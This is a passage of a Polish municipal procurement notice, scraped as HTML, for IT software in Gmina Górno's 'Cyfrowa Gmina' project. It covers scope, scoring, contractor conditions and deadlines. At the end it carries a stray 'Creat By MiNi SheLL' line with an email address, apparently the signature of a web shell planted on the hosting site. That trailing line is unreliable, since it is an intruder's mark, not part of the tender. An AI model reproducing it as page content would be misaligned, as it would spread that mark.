na dostarczony towar (wraz z dostawą Wykonawca przedłoży karty gwarancyjne) w podziale na części:<br/>CZĘŚĆ II - Dostawa i uruchomienie systemu odpowiedzialnego za zarządzanie licencjami<br/>- System odpowiedzialny za zarządzanie licencjami, monitorowanie ich terminu ważności, zarządzanie uprawnieniami z dowolnych systemów w ramach pracy jednostki organizacyjnej, procesem akceptacji przydzielanych uprawnień, integracji w zakresie możliwości nadawania uprawnień w systemach zintegrowanych, użytkownikami i uprawnieniami w aplikacji do zarządzania licencjami i uprawnieniami, zarządzaniem parametrami, zadaniami wsadowymi, monitoringiem wykonanych czynności oraz sterowanie wysyłką powiadomień za pośrednictwem brokera powiadomień, który zapewnia mechanizm wysyłki powiadomień dowolnym kanałem komunikacji<br/>1.1. Zakres zamówienia obejmuje:<br/>a) dostawę wyposażenia i urządzeń do miejsca montażu,<br/>b) ich montaż i rozmieszczenie w miejscu użytkowania, <br/>c) uruchomienie (podłączenie i wykonanie prób rozruchowych – jeżeli wymagane) i przekazanie wyposażenia do odbioru,<br/>d) konfigurację i instalację dostarczanego oprogramowania,<br/>e) wsparcie techniczne i opiekuna przez minimum okres zaoferowanej gwarancji i rękojmi,<br/>f) migrację oprogramowania z obecnych serwerów na dostarczane,<br/>g) integrację dostarczanych urządzeń i oprogramowania z istniejącą infrastrukturą programowo-sprzętową u Zamawiającego.<br/>1.2. Dostawa i montaż wyposażenia stanowiąca przedmiot niniejszego zamówienia odbędzie się na ryzyko i koszt Wykonawcy.<br/>1.3. Minimalny okres na jaki Wykonawca udzieli gwarancji jakości oraz rękojmi na dostarczony przedmiot zamówienia wynosi 24 miesiące.<br/>1.4. Wyposażenie stanowiące przedmiot zamówienia musi:<br/>a)	posiadać właściwe atesty, deklaracje zgodności, świadectwa jakości i dopuszczenia oraz inne dokumenty potwierdzające, że spełnia wszelkie normy i wymagania dla niego przewidziane prawem, <br/>b)	odpowiadać wymaganiom określonym w niniejszej SWZ,<br/>c)	być produktem bezpiecznym w rozumieniu ustawy z dnia 12.12.2003 r. o ogólnym bezpieczeństwie produktów (t.j. Dz.U. z 2003 r. Nr 229, poz. 2275.) wraz z aktami wykonawczymi,<br/>d)	jako przedmiot umowy przeznaczony do wyposażenia w placówce oświatowej, musi spełniać prawem przewidziane wymagania dla wyrobów stosowanych w placówkach oświatowych.<br/>1.5. Szczegółowy opis przedmiotu zamówienia, w podziale na części zawarto w załączniku nr 7. (7.1 do 7.3)<br/>1.6. Zamawiający nie wymaga dokonania wizji lokalnej.<br/>1.7. Jeżeli w jakimkolwiek miejscu SWZ i załącznikach do SWZ zostały wskazane do opisu asortymentu znaki towarowe lub pochodzenie – wszędzie tam Zamawiający dodaje wyrażenia „typu” / „równoważne”, co oznacza, że oferowany asortyment ma posiadać parametry (techniczne, jakościowe, funkcjonalne oraz użytkowe) takie same lub lepsze od opisanych. Podane w opisie przedmiotu zamówienia mają za zadanie jedynie sprecyzowanie wymagań jakościowych i są podane jako przykładowe.<br/>2. Zamawiający dopuszcza możliwość zmiany wielkości zamówienia (zwiększenie / zmniejszenie) o poszczególne elementy zamówienia podstawowego.<br/>3. Numeracja wskazana w zaproszeniu ofertowym oraz załącznikach jest zastosowana celem ułatwienia identyfikacji ponoszonych wydatków.<br/>4. Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 7, który należy wypełnić (wskazać nazwy i oferowane parametry techniczne, funkcjonalne, oprogramowanie) i dostarczyć przed podpisaniem umowy. Zamawiający wymaga od Wykonawców składających oferty, oprócz potwierdzenia ogólnym oświadczeniem jej zgodności z zaproszeniem ofertowym, konkretyzacji przedmiotu oferty przez wskazanie konkretnych oferowanych rozwiązań i wymaganych dokumentów.<br/>5. Przedmiot zamówienia należy wykonać zgodnie z warunkami postępowania. Dostarczane materiały, urządzenia powinny być fabrycznie nowe, nie używane i obejmować wszystkie pozycje wyszczególnione w załączniku od nr 7 w pełnym podanym zakresie, z uwzględnieniem wszystkich określonych w tym dokumencie wymagań.<br/>6. Dostawa poszczególnych egzemplarzy sprzętu nastąpi na koszt własny Wykonawcy, w opakowaniu firmowym producenta, odpowiadającym właściwościom sprzętu, zapewniającym jego całość i nienaruszalność.<br/>7. Sposób realizacji przedmiotu zamówienia:<br/>7.1 Wszystkie urządzenia mają być dostarczone w miejsce wskazane przez Zamawiającego – budynki administracyjne Urzędu Gminy Górno, podłączone i uruchomione. <br/>7.2 Do każdego dostarczonego urządzenia Wykonawca winny jest dostarczyć minimum:<br/>- kompletne opakowanie i zabezpieczenia<br/>- pisemną gwarancję<br/>- instrukcję obsługi w języku polskim <br/>- inne dokumenty potwierdzające zgodność dostarczonego asortymentu z wymaganiami Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny oferty:<br/>a) dla części I<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.2. Okres gwarancji i rękojmi (G) – waga kryterium 30 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 10 pkt<br/>b) dla części II<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>c) dla części III<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>2. Zasady oceny oferty w poszczególnych kryteriach:<br/>2.1. Cena ofertowa brutto (C)<br/>Liczba punktów = Cn/Cb x 60<br/>gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>- 60 - wskaźnik stały<br/>2.2 Kryterium okresu gwarancji i rękojmi (G) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>Wymagany okres gwarancji (24 miesiące) – 0 pkt<br/>Wymagany okres gwarancji zwiększony o 6 miesięcy – 15 pkt<br/>Wymagany okres gwarancji zwiększony o 12 miesięcy – 30 pkt<br/>2.3 Kryterium serwisu (S) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>a) pomoc techniczna: <br/>- całodobowa (10 pkt / 2,5 pkt dla części I)<br/>- w godz. 8:00 – 18:00 – min. 8 godz. w podanym przedziale (5 pkt / 1,5 pkt dla części I)<br/>- wskazany telefon kontaktowy oraz e-mail obsługiwany w dni robocze – wymóg minimalny, niepunktowany<br/>b) opiekun klienta <br/>- indywidualny opiekun klienta (10 pkt / 2,5 pkt dla części I)<br/>- regionalny opiekun klienta (5 pkt / 1,5 pkt dla części I)<br/>- infolinia czynna w dni robocze w godzinach pracy firmy – wymóg minimalny, niepunktowany<br/>c) serwis u klienta<br/>- serwis u klienta do 4 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- serwis u klienta najpóźniej następnego dnia roboczego od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- serwis u klienta najpóźniej do 3 dni roboczych od zgłoszenia – wymóg minimalny, niepunktowany<br/>d) pomoc zdalna<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 1 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 4 godz. od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu najpóźniej następnego dnia roboczego od zgłoszenia – wymóg minimalny, niepunktowany<br/>3. Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Pzp, spełnia wszystkie wymagania określone w niniejszej SWZ oraz została oceniona jako najkorzystniejsza w oparciu o podane wyżej kryteria oceny oferty z uwzględnieniem ofert częściowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis oraz pomoc techniczna (S)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest Zakup, dostawa i montaż sprzętu i oprogramowania informatycznego w ramach projektu grantowego „Cyfrowa Gmina”, wraz z wszelkimi kosztami, jakie poniesie Wykonawca z tytułu należytej realizacji przedmiotu zamówienia, a w szczególności z kosztami: dostarczenia, załadunku, rozładunku, montażu, wypakowania sprzętu i sprawdzenia funkcjonalności sprzętu (pierwsze uruchomienie - jeżeli wymagane), gwarancją jakości na dostarczony towar (wraz z dostawą Wykonawca przedłoży karty gwarancyjne) w podziale na części:<br/>CZĘŚĆ III - Dostawa i uruchomienie Elektronicznego Biura Obsługi Klienta<br/>- Elektroniczne Biuro Obsługi Klienta, za pośrednictwem którego użytkownicy będą mogli dokonywać transakcji on-line, w szczególności: przeglądać dane wynikające z zawartej umowy, sprawdzać stan rozliczeń, przeglądać wystawione faktury oraz składać uwagi, skargi i zapytania.<br/>1.1. Zakres zamówienia obejmuje:<br/>a) dostawę wyposażenia i urządzeń do miejsca montażu,<br/>b) ich montaż i rozmieszczenie w miejscu użytkowania, <br/>c) uruchomienie (podłączenie i wykonanie prób rozruchowych – jeżeli wymagane) i przekazanie wyposażenia do odbioru,<br/>d) konfigurację i instalację dostarczanego oprogramowania,<br/>e) wsparcie techniczne i opiekuna przez minimum okres zaoferowanej gwarancji i rękojmi,<br/>f) migrację oprogramowania z obecnych serwerów na dostarczane,<br/>g) integrację dostarczanych urządzeń i oprogramowania z istniejącą infrastrukturą programowo-sprzętową u Zamawiającego.<br/>1.2. Dostawa i montaż wyposażenia stanowiąca przedmiot niniejszego zamówienia odbędzie się na ryzyko i koszt Wykonawcy.<br/>1.3. Minimalny okres na jaki Wykonawca udzieli gwarancji jakości oraz rękojmi na dostarczony przedmiot zamówienia wynosi 24 miesiące.<br/>1.4. Wyposażenie stanowiące przedmiot zamówienia musi:<br/>a)	posiadać właściwe atesty, deklaracje zgodności, świadectwa jakości i dopuszczenia oraz inne dokumenty potwierdzające, że spełnia wszelkie normy i wymagania dla niego przewidziane prawem, <br/>b)	odpowiadać wymaganiom określonym w niniejszej SWZ,<br/>c)	być produktem bezpiecznym w rozumieniu ustawy z dnia 12.12.2003 r. o ogólnym bezpieczeństwie produktów (t.j. Dz.U. z 2003 r. Nr 229, poz. 2275.) wraz z aktami wykonawczymi,<br/>d)	jako przedmiot umowy przeznaczony do wyposażenia w placówce oświatowej, musi spełniać prawem przewidziane wymagania dla wyrobów stosowanych w placówkach oświatowych.<br/>1.5. Szczegółowy opis przedmiotu zamówienia, w podziale na części zawarto w załączniku nr 7. (7.1 do 7.3)<br/>1.6. Zamawiający nie wymaga dokonania wizji lokalnej.<br/>1.7. Jeżeli w jakimkolwiek miejscu SWZ i załącznikach do SWZ zostały wskazane do opisu asortymentu znaki towarowe lub pochodzenie – wszędzie tam Zamawiający dodaje wyrażenia „typu” / „równoważne”, co oznacza, że oferowany asortyment ma posiadać parametry (techniczne, jakościowe, funkcjonalne oraz użytkowe) takie same lub lepsze od opisanych. Podane w opisie przedmiotu zamówienia mają za zadanie jedynie sprecyzowanie wymagań jakościowych i są podane jako przykładowe.<br/>2. Zamawiający dopuszcza możliwość zmiany wielkości zamówienia (zwiększenie / zmniejszenie) o poszczególne elementy zamówienia podstawowego.<br/>3. Numeracja wskazana w zaproszeniu ofertowym oraz załącznikach jest zastosowana celem ułatwienia identyfikacji ponoszonych wydatków.<br/>4. Szczegółowy Opis Przedmiotu Zamówienia stanowi załącznik nr 7, który należy wypełnić (wskazać nazwy i oferowane parametry techniczne, funkcjonalne, oprogramowanie) i dostarczyć przed podpisaniem umowy. Zamawiający wymaga od Wykonawców składających oferty, oprócz potwierdzenia ogólnym oświadczeniem jej zgodności z zaproszeniem ofertowym, konkretyzacji przedmiotu oferty przez wskazanie konkretnych oferowanych rozwiązań i wymaganych dokumentów.<br/>5. Przedmiot zamówienia należy wykonać zgodnie z warunkami postępowania. Dostarczane materiały, urządzenia powinny być fabrycznie nowe, nie używane i obejmować wszystkie pozycje wyszczególnione w załączniku od nr 7 w pełnym podanym zakresie, z uwzględnieniem wszystkich określonych w tym dokumencie wymagań.<br/>6. Dostawa poszczególnych egzemplarzy sprzętu nastąpi na koszt własny Wykonawcy, w opakowaniu firmowym producenta, odpowiadającym właściwościom sprzętu, zapewniającym jego całość i nienaruszalność.<br/>7. Sposób realizacji przedmiotu zamówienia:<br/>7.1 Wszystkie urządzenia mają być dostarczone w miejsce wskazane przez Zamawiającego – budynki administracyjne Urzędu Gminy Górno, podłączone i uruchomione. <br/>7.2 Do każdego dostarczonego urządzenia Wykonawca winny jest dostarczyć minimum:<br/>- kompletne opakowanie i zabezpieczenia<br/>- pisemną gwarancję<br/>- instrukcję obsługi w języku polskim <br/>- inne dokumenty potwierdzające zgodność dostarczonego asortymentu z wymaganiami Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48000000-8 - Pakiety oprogramowania i systemy informatyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny oferty:<br/>a) dla części I<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.2. Okres gwarancji i rękojmi (G) – waga kryterium 30 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 10 pkt<br/>b) dla części II<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>c) dla części III<br/>1.1. Cena ofertowa brutto (C) – waga kryterium 60 pkt<br/>1.3. Serwis oraz pomoc techniczna (S) – waga kryterium 40 pkt<br/>2. Zasady oceny oferty w poszczególnych kryteriach:<br/>2.1. Cena ofertowa brutto (C)<br/>Liczba punktów = Cn/Cb x 60<br/>gdzie:<br/>- Cn – najniższa cena spośród wszystkich ofert nie odrzuconych<br/>- Cb – cena oferty badanej<br/>- 60 - wskaźnik stały<br/>2.2 Kryterium okresu gwarancji i rękojmi (G) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>Wymagany okres gwarancji (24 miesiące) – 0 pkt<br/>Wymagany okres gwarancji zwiększony o 6 miesięcy – 15 pkt<br/>Wymagany okres gwarancji zwiększony o 12 miesięcy – 30 pkt<br/>2.3 Kryterium serwisu (S) będzie oceniane na podstawie okresu podanego w formularzu ofertowym i przeliczane wg następującej punktacji:<br/>a) pomoc techniczna: <br/>- całodobowa (10 pkt / 2,5 pkt dla części I)<br/>- w godz. 8:00 – 18:00 – min. 8 godz. w podanym przedziale (5 pkt / 1,5 pkt dla części I)<br/>- wskazany telefon kontaktowy oraz e-mail obsługiwany w dni robocze – wymóg minimalny, niepunktowany<br/>b) opiekun klienta <br/>- indywidualny opiekun klienta (10 pkt / 2,5 pkt dla części I)<br/>- regionalny opiekun klienta (5 pkt / 1,5 pkt dla części I)<br/>- infolinia czynna w dni robocze w godzinach pracy firmy – wymóg minimalny, niepunktowany<br/>c) serwis u klienta<br/>- serwis u klienta do 4 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- serwis u klienta najpóźniej następnego dnia roboczego od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- serwis u klienta najpóźniej do 3 dni roboczych od zgłoszenia – wymóg minimalny, niepunktowany<br/>d) pomoc zdalna<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 1 godz. od zgłoszenia (10 pkt / 2,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu do 4 godz. od zgłoszenia (5 pkt / 1,5 pkt dla części I)<br/>- kontakt opiekuna wraz z rozwiązaniem zgłoszonego problemu najpóźniej następnego dnia roboczego od zgłoszenia – wymóg minimalny, niepunktowany<br/>3. Punktacja przyznana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiada zasadom określonym w ustawie Pzp, spełnia wszystkie wymagania określone w niniejszej SWZ oraz została oceniona jako najkorzystniejsza w oparciu o podane wyżej kryteria oceny oferty z uwzględnieniem ofert częściowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Serwis oraz pomoc techniczna (S)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w VI SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki:<br/>2.1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.3. Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2.4. Zdolności technicznej lub zawodowej:<br/>Zamawiający uzna ww. warunek za spełniony jeżeli:<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał przynajmniej:<br/>dla CZĘŚCI I – 1 dostawę sprzętu komputerowego o wartości min. 100 000,00 zł<br/>dla CZĘŚCI II – 1 dostawę oprogramowania funkcjonującego na bazie licencji o wartości min. 20 000,00 zł<br/>dla CZĘŚCI III – 1 dostawę oprogramowania funkcjonującego na bazie komunikacji pomiędzy administratorem a użytkownikami o wartości min. 20 000,00 zł <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, <br/>b) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U.2021.0.275 t.j.) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym Załącznik nr 5 do SWZ.<br/>Zamawiający w sytuacji, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy Pzp żąda przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych powyżej (1-2).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy<br/>Wykaz należy sporządzić wg załącznika nr 6 do SWZ.<br/>W przypadku składania oferty przez Wykonawców występujących wspólnie wyżej wymieniony warunek mogą spełnić łącznie.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy załączyć do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/>1) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>2) Oświadczenie stanowiące załącznik nr 3 do SWZ potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej składa każdy z Wykonawców wspólnie ubiegających się o zamówienie; <br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy - załącznik nr 8 do SWZ.<br/>3. Jeżeli w postępowaniu o udzielenie zamówienia publicznego zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający żąda dostarczenia przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, stanowią Załącznik nr 1 do SWZ Wzór umowy.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 1 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza ofertowego stanowiącego załącznik nr 2 do SWZ znajdującej się pod adresem: https://gminagorno.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-17 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com